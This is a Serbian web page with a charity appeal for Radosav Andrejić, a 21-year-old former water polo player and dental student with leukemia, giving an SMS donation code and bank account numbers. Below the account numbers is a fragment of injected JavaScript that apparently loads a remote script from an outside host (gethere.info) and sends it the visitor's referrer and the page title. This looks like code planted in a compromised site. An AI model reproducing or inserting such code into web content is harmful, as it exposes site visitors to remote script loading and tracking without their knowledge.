HUMANITARNA AKCIJA: Pomozimo Radosavu da pobedi leukemiju

HUMANITARNA AKCIJA: Pomozimo Radosavu da pobedi leukemiju


Bivši vaterpolista Radosav Andrejić (21) do februara ove godine živeo je punim plućima, kao svi mladići u dvadesetim godinama. Onda se u jednom danu sve promenilo, kada je sportista saznao da boluje od leukemije. Od tog dana on bije najvažniju bitku – za život.

Radosav je rođen 1995. godine. Godinama je trenirao vaterpolo, a oprobao se i kao fudbalski sudija. Sportsku karijeru stavio je u drugi plan kada je upisao Stomatološki fakultet u Beogradu. Kada je saznao da boluje od leukemije, Radosav je bio na drugoj godini studija.

Iako je bolest progresivna, za Radosavljevo izlečenje ima nade. Njemu je hitno potrebno lečenje matičnim ćelijama u Nemačkoj koje porodica nije u mogućnosti da plati. Kako vreme u ovoj bitki nije saveznik, porodica i prijatelji mole sve ljude dobre volje da pomognu kako bi Radosav dobio potrebno lečenje. Pomozimo Radosavu da nastavi da živi svoje snove!

Da pomognete Radosavu upišite 173 i pošaljite SMS na 3030. Radosavu, možete pomoći i uplatom na dinarski ili devizni račun, kao i platnom karticom na linku e-doniraj.

Dinarski račun: 160-445365-59
Devizni račun: 00-540-0001539.6

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar